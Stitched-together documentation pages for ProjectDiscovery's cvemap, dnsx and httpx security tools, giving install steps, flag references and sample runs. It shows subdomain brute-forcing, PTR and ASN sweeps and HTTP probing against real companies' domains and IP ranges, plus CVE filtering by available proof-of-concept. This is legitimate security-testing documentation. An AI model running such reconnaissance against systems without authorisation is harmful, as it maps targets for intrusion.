"cpe:2.3:a:ivanti:connect_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.6:r1:*:*:*:*:*:*"
]
}
]
```
## Advanced Filters
You can use the `-q` query option to combine multiple filters in a single search. For example:
```bash
cvemap -q '"remote code execution" 2023 is_remote:true is_poc:true sort_asc:age_in_days'
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|---------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993| 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
You can see the documentation for all available filters below:
### Metadata
Age of the CVE
The assignee for this CVE.
Typically this is an email address such as `security@apache.org` or `cve@mitre.org`
The description of the CVE from the NVD
The CVE ID for a specific CVE such as `CVE-2019-7070`
The CVSS v3.0 score for this CVE. Example: `8.8`
Is the CVE marked as a [Known Exploited Vulnerability (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Is this CVE in open source software with OSS data available?
Is there a Proof of Concept (POC) available for this CVE?
Is this CVE remotely exploitable?
Is there a Nuclei Template available for this CVE?
The URL for the patch for this CVE.
Example: `https://helpx.adobe.com/security/products/acrobat/apsb19-07.html`
The published date and time for this CVE. Example: `2019-05-24T19:29:02.080`
The URL reference for this CVE.
Example: `https://www.zerodayinitiative.com/advisories/ZDI-19-210/`
The CVSS 3.0 severity for this CVE. Example: `severity`
The last date and time that this CVE was updated. Example: `2019-08-21T16:20:31.353`
The URL for the vendor advisory for this CVE.
Example: `vendor_advisory`
The vulnerability status of this CVE. Example: `confirmed`
The CPE string for this CVE. Example: `cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:*`
### CPE Data
Common Platform Enumeration (CPE) Data
The full Common Platform Enumeration String. Example:
```
cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*
```
Common Platform Enumeration framework. Example: `wordpress`
Common Platform Enumeration product. Example: `acrobat_dc`
Common Platform Enumeration vendor. Example: `adobe`
### CVSS Data
Common Vulnerability Scoring System (CVSS) Data
CVSS v2 Score. Example: `9.3`
CVSS v2 severity. Example: `critical`
CVSS v2 vector. Example: `CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C`
CVSS v3.0 Score. Example: `8.8`
CVSS v3.0 severity. Example: `high`
CVSS v3.0 vector. Example: `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
CVSS v3.1 Score. Example: `7`
CVSS v3.1 severity. Example: `high`
CVSS v3.1 vector. Example: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
### EPSS Data
Exploit Prediction Scoring System (EPSS) Data
The EPSS percentile. Example: `0.80053`
The EPSS score. Example: `0.00826`
### HackerOne Data
Number of hackerone reports for this CVE. Example: `0`
The hackerone rank for this CVE. Example: `6279`
### KEV Data
Known Exploited Vulnerability (KEV) Data
Date added to the KEV. Example `2022-04-15`
The KEV due Date. Example `2022-05-06`
### Nuclei Template Data
Date and time that the Nuclei Template was created. Example `2020-04-05T23:31:09+05:30`
The GitHub issue for this template. Example `https://github.com/projectdiscovery/nuclei-templates/issues/7549`
The GitHub issue type for this template - has it been mentioned or is there a template created? Example `mention` or `template`
The full path for this template. Example `http/cves/2019/CVE-2019-12314.yaml`
The GitHub pull request for this template. Example `https://github.com/projectdiscovery/nuclei-templates/pull/3200`
The public ProjectDiscovery Cloud Platform URL for this template. Example `https://cloud.projectdiscovery.io/public/CVE-2019-12314`
Date and time that the Nuclei Template was last updated. Example `2023-12-29T09:30:44Z`
### Open Source Software (OSS) Data
Date and time that the OSS repository was created. Example `2009-05-21 01:33:45 +0000 UTC`
Description for this software. Example `Mirror of Apache ActiveMQ`
The number of forks for this project. Example `1407`
The primary programming language of this software. Example `Java`
Date and time of the most recent push to this repository. Example `2023-12-12 17:51:19 +0000 UTC`
The number of stars for this project. Example `2221`
The number of subscribers for this repository. Example `200`
The topics for this project. Example `php`
Date and time that the project was last updated. Example `2023-12-29 09:29:55 +0000 UTC`
The public repository URL. Example `https://github.com/apache/activemq`
### Proof of Concept (POC) Data
Date and time that the POC was added. Example `2019-04-02T12:50:46Z`
The source of the POC. Example `trickest`
The URL of the POC. Example `https://medium.com/@alt3kx/a-reflected-xss-in-print-archive-system-v2015-release-2-6-cve-2019-10685-b60763b7768b`
### Shodan Data
Number of Shodan results related to this CVE.
The Shodan query for this CVE. Example `cpe:\"cpe:2.3:a:adobe:coldfusion\"`
### CWE Data
Common Weakness Enumeration (CWE) Data
The CWE ID for this CVE. Example `CWE-416`
The CWE name for this CVE. Example `Use After Free`
# cvemap usage
Source: https://docs.projectdiscovery.io/tools/cvemap/usage
Learn cvemap usage including flags and filters
## Access help
Use `cvemap -h` to display all of the help options.
## cvemap help options
```
Flags:
CONFIG:
-auth configure projectdiscovery cloud (pdcp) api key
OPTIONS:
-id string[] cve to list for given id
-v, -vendor string[] cve to list for given vendor
-p, -product string[] cve to list for given product
-eproduct string[] cves to exclude based on products
-s, -severity string[] cve to list for given severity
-cs, -cvss-score string[] cve to list for given cvss score
-c, -cpe string cve to list for given cpe
-es, -epss-score string cve to list for given epss score
-ep, -epss-percentile string[] cve to list for given epss percentile
-age string cve to list published by given age in days
-a, -assignee string[] cve to list for given publisher assignee
-vs, -vstatus value cve to list for given vulnerability status in cli output. supported: modified, rejected, unknown, new, confirmed, unconfirmed
UPDATE:
-up, -update update cvemap to latest version
-duc, -disable-update-check disable automatic cvemap update check
FILTER:
-q, -search string search in cve data
-k, -kev display cves marked as exploitable vulnerabilities by cisa (default true)
-t, -template display cves that has public nuclei templates (default true)
-poc display cves that has public published poc (default true)
-h1, -hackerone display cves reported on hackerone (default true)
-re, -remote display remotely exploitable cves (AV:N & PR:N | PR:L) (default true)
OUTPUT:
-f, -field value fields to display in cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-fe, -exclude value fields to exclude from cli output. supported: age, kev, template, poc, cwe, vendor, vstatus, epss, product, assignee
-lsi, -list-id list only the cve ids in the output
-l, -limit int limit the number of results to display (default 50)
-offset int offset the results to display
-j, -json return output in json format
-epk, -enable-page-keys enable page keys to navigate results
DEBUG:
-version Version
-silent Silent
-verbose Verbose
```
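As a sketch of combining these options, the invocation below restricts results by vendor and severity and pages through them interactively (the vendor value is just an example):
```bash
# critical Apache CVEs, 25 at a time, with page-key navigation enabled
cvemap -vendor apache -severity critical -limit 25 -enable-page-keys
```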
## Notes on usage
* The CVE dataset is updated every 6 hours.
## References
* **[National Vulnerability Database (NVD)](https://nvd.nist.gov/developers)**: Comprehensive CVE vulnerability data.
* **[Known Exploited Vulnerabilities Catalog (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)**: Exploited vulnerabilities catalog.
* **[Exploit Prediction Scoring System (EPSS)](https://www.first.org/epss/data_stats)**: Exploit prediction scores.
* **[HackerOne](https://hackerone.com/hacktivity/cve_discovery)**: CVE discoveries disclosure.
* **[Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates)**: Vulnerability validation templates.
* **[Live-Hack-CVE](https://github.com/Live-Hack-CVE/) / [PoC-in-GitHub](https://github.com/nomi-sec/PoC-in-GitHub/)** GitHub Repository: Vulnerability PoCs references.
# Installing dnsx
Source: https://docs.projectdiscovery.io/tools/dnsx/install
Learn about how to install and get started with dnsx
Enter the command below in a terminal to install ProjectDiscovery's dnsx using Go.
```bash
go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
```
```bash
brew install dnsx
```
Supported on **macOS** (and Linux)
```bash
docker pull projectdiscovery/dnsx:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
```bash
https://github.com/projectdiscovery/dnsx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* dnsx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/dnsx`
# dnsx Overview
Source: https://docs.projectdiscovery.io/tools/dnsx/overview
A fast DNS toolkit for running various probes with multiple features
## What is dnsx?
`dnsx` is a fast and multi-purpose DNS toolkit designed for running various probes through the [retryabledns](https://github.com/projectdiscovery/retryabledns) library.
It supports multiple DNS query types, user-supplied resolvers, and DNS wildcard filtering like [shuffledns](https://github.com/projectdiscovery/shuffledns).
## Features and capabilities
* Simple and easy-to-use utility to query DNS records
* **A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA** query support
* DNS **Resolution** / **Brute-force** support
* Custom **resolver** input support
* Multiple resolver format **(TCP/UDP/DOH/DOT)** support
* **stdin** and **stdout** support
* Automatic **wildcard** handling support
## Additional dnsx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
* [https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/](https://www.geeksforgeeks.org/dnsx-dns-toolkit-allow-to-run-multiple-dns-queries/)
* [https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0](https://www.kitploit.com/2020/11/dnsx-fast-and-multi-purpose-dns-toolkit.html?m=0)
* [https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/](https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/)
Sharing any external resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
## Support
Questions about using dnsx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running dnsx
Source: https://docs.projectdiscovery.io/tools/dnsx/running
Learn about running dnsx with examples including commands and output
For all of the flags and options available for `dnsx` be sure to check out the [Usage](/tools/dnsx/usage) page. On this page we share examples of running `dnsx` with specific flags and goals, and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### DNS Resolving
Filter active hostnames from the list of passive subdomains, obtained from various sources:
```console
subfinder -silent -d hackerone.com | dnsx -silent
a.ns.hackerone.com
www.hackerone.com
api.hackerone.com
docs.hackerone.com
mta-sts.managed.hackerone.com
mta-sts.hackerone.com
resources.hackerone.com
b.ns.hackerone.com
mta-sts.forwarding.hackerone.com
events.hackerone.com
support.hackerone.com
```
Print **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp
www.hackerone.com [104.16.100.52]
www.hackerone.com [104.16.99.52]
hackerone.com [104.16.99.52]
hackerone.com [104.16.100.52]
api.hackerone.com [104.16.99.52]
api.hackerone.com [104.16.100.52]
mta-sts.forwarding.hackerone.com [185.199.108.153]
mta-sts.forwarding.hackerone.com [185.199.109.153]
mta-sts.forwarding.hackerone.com [185.199.110.153]
mta-sts.forwarding.hackerone.com [185.199.111.153]
a.ns.hackerone.com [162.159.0.31]
resources.hackerone.com [52.60.160.16]
resources.hackerone.com [3.98.63.202]
resources.hackerone.com [52.60.165.183]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [185.199.110.153]
mta-sts.hackerone.com [185.199.111.153]
mta-sts.hackerone.com [185.199.109.153]
mta-sts.hackerone.com [185.199.108.153]
gslink.hackerone.com [13.35.210.17]
gslink.hackerone.com [13.35.210.38]
gslink.hackerone.com [13.35.210.83]
gslink.hackerone.com [13.35.210.19]
b.ns.hackerone.com [162.159.1.31]
docs.hackerone.com [185.199.109.153]
docs.hackerone.com [185.199.110.153]
docs.hackerone.com [185.199.111.153]
docs.hackerone.com [185.199.108.153]
support.hackerone.com [104.16.51.111]
support.hackerone.com [104.16.53.111]
mta-sts.managed.hackerone.com [185.199.108.153]
mta-sts.managed.hackerone.com [185.199.109.153]
mta-sts.managed.hackerone.com [185.199.110.153]
mta-sts.managed.hackerone.com [185.199.111.153]
```
Extract **A** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -a -resp-only
104.16.99.52
104.16.100.52
162.159.1.31
104.16.99.52
104.16.100.52
185.199.110.153
185.199.111.153
185.199.108.153
185.199.109.153
104.16.99.52
104.16.100.52
104.16.51.111
104.16.53.111
185.199.108.153
185.199.111.153
185.199.110.153
185.199.111.153
```
Extract **CNAME** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -cname -resp
support.hackerone.com [hackerone.zendesk.com]
resources.hackerone.com [read.uberflip.com]
mta-sts.hackerone.com [hacker0x01.github.io]
mta-sts.forwarding.hackerone.com [hacker0x01.github.io]
events.hackerone.com [whitelabel.bigmarker.com]
```
Extract **ASN** records for the given list of subdomains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -asn
b.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
a.ns.hackerone.com [AS13335, CLOUDFLARENET, US]
hackerone.com [AS13335, CLOUDFLARENET, US]
www.hackerone.com [AS13335, CLOUDFLARENET, US]
api.hackerone.com [AS13335, CLOUDFLARENET, US]
support.hackerone.com [AS13335, CLOUDFLARENET, US]
```
Probe using [dns status code](https://github.com/projectdiscovery/dnsx/wiki/RCODE-ID-VALUE-Mapping) on given list of (sub)domains:
```console
subfinder -silent -d hackerone.com | dnsx -silent -rcode noerror,servfail,refused
ns.hackerone.com [NOERROR]
a.ns.hackerone.com [NOERROR]
b.ns.hackerone.com [NOERROR]
support.hackerone.com [NOERROR]
resources.hackerone.com [NOERROR]
mta-sts.hackerone.com [NOERROR]
www.hackerone.com [NOERROR]
mta-sts.forwarding.hackerone.com [NOERROR]
docs.hackerone.com [NOERROR]
```
Extract subdomains from given network range using `PTR` query:
```console
echo 173.0.84.0/24 | dnsx -silent -resp-only -ptr
cors.api.paypal.com
trinityadminauth.paypal.com
cld-edge-origin-api.paypal.com
appmanagement.paypal.com
svcs.paypal.com
trinitypie-serv.paypal.com
ppn.paypal.com
pointofsale-new.paypal.com
pointofsale.paypal.com
slc-a-origin-pointofsale.paypal.com
fpdbs.paypal.com
```
Extract subdomains from given ASN using `PTR` query:
```console
echo AS17012 | dnsx -silent -resp-only -ptr
apiagw-a.paypal.com
notify.paypal.com
adnormserv-slc-a.paypal.com
a.sandbox.paypal.com
apps2.paypal-labs.com
pilot-payflowpro.paypal.com
www.paypallabs.com
paypal-portal.com
micropayments.paypal-labs.com
minicart.paypal-labs.com
```
***
### DNS Bruteforce
Bruteforce subdomains for a given domain or list of domains using the `-d` and `-w` flags:
```console
dnsx -silent -d facebook.com -w dns_worldlist.txt
blog.facebook.com
booking.facebook.com
api.facebook.com
analytics.facebook.com
beta.facebook.com
apollo.facebook.com
ads.facebook.com
box.facebook.com
alpha.facebook.com
apps.facebook.com
connect.facebook.com
c.facebook.com
careers.facebook.com
code.facebook.com
```
Bruteforce targeted subdomains using single or multiple keyword input, as the `-d` and `-w` flags support file or comma-separated keyword inputs:
```console
dnsx -silent -d domains.txt -w jira,grafana,jenkins
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
Values are accepted from **stdin** for all the input types (`-list`, `-domain`, `-wordlist`). The `-list` flag defaults to `stdin`, but the same can be achieved for other input types by adding a `-` (dash) as parameter:
```console
cat domains.txt | dnsx -silent -w jira,grafana,jenkins -d -
grafana.1688.com
grafana.8x8.vc
grafana.airmap.com
grafana.aerius.nl
jenkins.1688.com
jenkins.airbnb.app
jenkins.airmap.com
jenkins.ahn.nl
jenkins.achmea.nl
jira.amocrm.com
jira.amexgbt.com
jira.amitree.com
jira.arrival.com
jira.atlassian.net
jira.atlassian.com
```
#### DNS Bruteforce with Placeholder based wordlist
```bash
$ cat tld.txt
com
by
de
be
al
bi
cg
dj
bs
```
```console
dnsx -d google.FUZZ -w tld.txt -resp
_ __ __
__| | _ __ ___ \ \/ /
/ _' || '_ \ / __| \ /
| (_| || | | |\__ \ / \
\__,_||_| |_||___//_/\_\ v1.1.2
projectdiscovery.io
google.de [142.250.194.99]
google.com [142.250.76.206]
google.be [172.217.27.163]
google.bs [142.251.42.35]
google.bi [216.58.196.67]
google.al [216.58.196.68]
google.by [142.250.195.4]
google.cg [142.250.183.131]
google.dj [142.250.192.3]
```
### Wildcard filtering
A special feature of `dnsx` is its ability to handle **multi-level DNS based wildcards**, and to do so with a very reduced number of DNS requests. Sometimes all the subdomains will resolve, which leads to a lot of garbage in the output. The way `dnsx` handles this is by keeping track of how many subdomains point to an IP; if the count of subdomains pointing to an IP increases beyond a certain threshold, it checks for wildcards on all the levels of the hosts for that IP iteratively.
```console
dnsx -l subdomain_list.txt -wd airbnb.com -o output.txt
```
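The detection threshold can be tuned with the `-wt, -wildcard-threshold` flag (default 5) if the default is too aggressive or too lenient for a given target, for example:
```console
dnsx -l subdomain_list.txt -wd airbnb.com -wt 10 -o output.txt
```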
***
### Dnsx as a library
It's possible to use the `dnsx` library directly in your Go programs. The following code snippet shows a basic example; refer to [here](https://pkg.go.dev/github.com/projectdiscovery/dnsx@v1.1.0/libs/dnsx) for detailed package configuration and usage.
```go
package main

import (
	"fmt"

	"github.com/projectdiscovery/dnsx/libs/dnsx"
)

func main() {
	// Create DNS Resolver with default options
	dnsClient, err := dnsx.New(dnsx.DefaultOptions)
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}

	// DNS A question and returns corresponding IPs
	result, err := dnsClient.Lookup("hackerone.com")
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}
	for idx, msg := range result {
		fmt.Printf("%d: %s\n", idx+1, msg)
	}

	// Query
	rawResp, err := dnsClient.QueryOne("hackerone.com")
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}
	fmt.Printf("rawResp: %v\n", rawResp)

	jsonStr, err := rawResp.JSON()
	if err != nil {
		fmt.Printf("err: %v\n", err)
		return
	}
	fmt.Println(jsonStr)
}
```
# dnsx Usage
Source: https://docs.projectdiscovery.io/tools/dnsx/usage
Learn dnsx usage including queries, filters, and configurations
## Access help
Use `dnsx -h` to display all of the help options.
## Help options
```console
INPUT:
-l, -list string list of sub(domains)/hosts to resolve (file or stdin)
-d, -domain string list of domain to bruteforce (file or comma separated or stdin)
-w, -wordlist string list of words to bruteforce (file or comma separated or stdin)
QUERY:
-a query A record (default)
-aaaa query AAAA record
-cname query CNAME record
-ns query NS record
-txt query TXT record
-srv query SRV record
-ptr query PTR record
-mx query MX record
-soa query SOA record
-axfr query AXFR
-caa query CAA record
-any query ANY record
FILTER:
-re, -resp display dns response
-ro, -resp-only display dns response only
-rc, -rcode string filter result by dns status code (eg. -rcode noerror,servfail,refused)
PROBE:
-cdn display cdn name
-asn display host asn information
RATE-LIMIT:
-t, -threads int number of concurrent threads to use (default 100)
-rl, -rate-limit int number of dns request/second to make (disabled as default) (default -1)
UPDATE:
-up, -update update dnsx to latest version
-duc, -disable-update-check disable automatic dnsx update check
OUTPUT:
-o, -output string file to write output
-j, -json write output in JSONL(ines) format
-omit-raw, -or omit raw dns response from jsonl output
DEBUG:
-hc, -health-check run diagnostic check up
-silent display only results in the output
-v, -verbose display verbose output
-raw, -debug display raw dns response
-stats display stats of the running scan
-version display version of dnsx
OPTIMIZATION:
-retry int number of dns attempts to make (must be at least 1) (default 2)
-hf, -hostsfile use system host file
-trace perform dns tracing
-trace-max-recursion int Max recursion for dns trace (default 32767)
-resume resume existing scan
-stream stream mode (wordlist, wildcard, stats and stop/resume will be disabled)
CONFIGURATIONS:
-r, -resolver string list of resolvers to use (file or comma separated)
-wt, -wildcard-threshold int wildcard filter threshold (default 5)
-wd, -wildcard-domain string domain name for wildcard filtering (other flags will be ignored)
```
## Notes on usage
* By default, `dnsx` checks for the **A** record.
* By default `dnsx` uses Google, Cloudflare, Quad9 [resolver](https://github.com/projectdiscovery/dnsx/blob/43af78839e237ea8cbafe571df1ab0d6cbe7f445/libs/dnsx/dnsx.go#L31).
* A custom resolver list can be loaded using the `-r` flag (see the example after this list).
* Domain name (`-wd`) input is mandatory for wildcard elimination.
* The DNS record flag cannot be used when using wildcard filtering.
* DNS resolution (`-l`) and DNS brute-forcing (`-w`) can't be used together.
* VPN operators tend to filter high DNS/UDP traffic, therefore the tool might experience packet loss (eg. [Mullvad VPN](https://github.com/projectdiscovery/dnsx/issues/221))
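For example, an illustrative run that resolves a single host through a custom resolver list supplied on the command line:
```console
echo hackerone.com | dnsx -silent -a -resp -r 1.1.1.1,8.8.8.8
```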
`dnsx` is made with 🖤 by the [projectdiscovery](https://projectdiscovery.io) team.
# Installing httpx
Source: https://docs.projectdiscovery.io/tools/httpx/install
Learn about how to install and get started with httpx
Enter the command below in a terminal to install ProjectDiscovery's httpx using Go.
```bash
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
```
```bash
brew install httpx
```
Supported on **macOS** (and Linux)
```bash
docker pull projectdiscovery/httpx:latest
```
{/* Docker-specific usage instructions can be found [here](./running#running-with-docker). */}
Enter the commands below in a terminal to install ProjectDiscovery's httpx using GitHub.
```bash
git clone https://github.com/projectdiscovery/httpx.git; \
cd httpx/cmd/httpx; \
go build; \
mv httpx /usr/local/bin/; \
httpx -version;
```
```bash
https://github.com/projectdiscovery/httpx/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* httpx requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export PATH=$PATH:$HOME/go/bin >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/httpx`
# httpx Overview
Source: https://docs.projectdiscovery.io/tools/httpx/overview
An HTTP toolkit that probes services, web servers, and other valuable metadata
## What is **httpx?**
httpx is a fast and multi-purpose HTTP toolkit built to support running multiple probes using a public library.
Probes are specific tests or checks to gather information about web servers, URLs, or other HTTP elements.
Httpx is designed to maintain result reliability with an increased number of threads.
Typically, users employ httpx to efficiently identify and analyze web server configurations, verify HTTP responses, and diagnose potential vulnerabilities or misconfigurations.
It can also be used in a pipeline that transitions from asset identification to technology enrichment and then feeds into detection of vulnerabilities.
## Features and capabilities
* A simple and modular code base for easy contribution
* Configurable flags to probe multiple elements
* Support for multiple HTTP based probes
* Smart auto-fallback from https to http
* Support for hosts, URLs and CIDR
* Handling for edge cases: retries, backoffs for WAFs
* UI Dashboard for results
## Additional httpx resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery’s httpx should not be confused with the httpx Python library. Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://www.kali.org/tools/httpx-toolkit/](https://www.kali.org/tools/httpx-toolkit/)
* [https://www.hackingarticles.in/a-detailed-guide-on-httpx/](https://www.hackingarticles.in/a-detailed-guide-on-httpx/)
## Support
Questions about using httpx? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running httpx
Source: https://docs.projectdiscovery.io/tools/httpx/running
Learn about running httpx with examples including commands and output
For all of the flags and options available for `httpx` be sure to check out the [Usage](/tools/httpx/usage) page. On this page we'll share examples running httpx with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
### ASN Fingerprint
Use `httpx` with the `-asn` flag for ASN (Autonomous System Number) fingerprinting, an effective technique for mapping the network affiliations of various domains.
```
subfinder -d hackerone.com -silent | httpx -asn
__ __ __ _ __
/ /_ / /_/ /_____ | |/ /
/ __ \/ __/ __/ __ \| /
/ / / / /_/ /_/ /_/ / |
/_/ /_/\__/\__/ .___/_/|_|
/_/ v1.2.1
projectdiscovery.io
Use with caution. You are responsible for your actions.
Developers assume no liability and are not responsible for any misuse or damage.
https://mta-sts.managed.hackerone.com [AS54113, FASTLY, US]
https://gslink.hackerone.com [AS16509, AMAZON-02, US]
https://www.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.forwarding.hackerone.com [AS54113, FASTLY, US]
https://resources.hackerone.com [AS16509, AMAZON-02, US]
https://support.hackerone.com [AS13335, CLOUDFLARENET, US]
https://mta-sts.hackerone.com [AS54113, FASTLY, US]
https://docs.hackerone.com [AS54113, FASTLY, US]
https://api.hackerone.com [AS13335, CLOUDFLARENET, US]
```
### ASN Input
Specify an [autonomous system number (ASN)](https://en.wikipedia.org/wiki/Autonomous_system_\(Internet\)) and `httpx` will fetch all IP addresses of that autonomous system and probe them.
```
echo AS14421 | httpx -silent
https://216.101.17.248
https://216.101.17.249
https://216.101.17.250
https://216.101.17.251
https://216.101.17.252
```
### CIDR Input
Run `httpx` with CIDR input (for example 173.0.84.0/24)
```
echo 173.0.84.0/24 | httpx -silent
https://173.0.84.29
https://173.0.84.43
https://173.0.84.31
https://173.0.84.44
https://173.0.84.12
https://173.0.84.4
https://173.0.84.36
https://173.0.84.45
https://173.0.84.14
https://173.0.84.25
https://173.0.84.46
https://173.0.84.24
https://173.0.84.32
https://173.0.84.9
https://173.0.84.13
https://173.0.84.6
https://173.0.84.16
https://173.0.84.34
```
### Docker Run
Use Docker to run `httpx` in an isolated container. For example, by piping subdomain lists into the Docker container, you can seamlessly perform probing across multiple targets, harnessing the power of `httpx` without direct installation requirements.
```
cat sub_domains.txt | docker run -i projectdiscovery/httpx
__ __ __ _ __
